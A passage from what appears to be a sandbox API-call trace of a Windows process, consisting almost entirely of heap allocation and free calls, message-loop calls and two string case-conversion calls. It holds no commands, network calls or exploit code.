Flags=0x0, Size=0x10) returned 0x2e51910 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0252.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0252.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0252.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0252.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0252.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0252.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0252.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0252.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0252.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0252.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0252.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0252.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0252.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0252.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0252.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0252.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0252.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0252.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0252.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0252.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0252.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0252.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0252.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0252.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0252.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0252.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0252.877] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0252.877] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0252.877] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0252.877] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0252.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0252.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0252.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0252.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0252.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0252.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0252.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0252.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0252.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0252.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0252.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0252.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0252.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0252.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0252.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0252.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0252.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0252.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0252.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0252.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0252.880] CharLowerBuffW (in: lpsz="byte[85792]", cchLength=0xb | out: lpsz="byte[85792]") returned 0xb [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0252.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0252.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0252.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f20) returned 0x2e94240 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0252.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0252.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0252.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0252.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0252.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0252.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0252.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0252.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0252.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f18) returned 0x2ea9168 [0252.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0252.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f18) returned 0x2ebe088 [0252.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0252.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0252.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0252.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0252.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0252.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9168 | out: hHeap=0x970000) returned 1 [0252.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0252.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0252.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebe088 | out: hHeap=0x970000) returned 1 [0252.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0252.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0252.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0252.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0252.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0252.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0252.890] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0252.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0252.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0252.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.891] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0252.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0252.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0252.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0252.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0252.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0252.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0252.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0252.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0252.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0252.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0252.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.892] RtlAllocateHeap 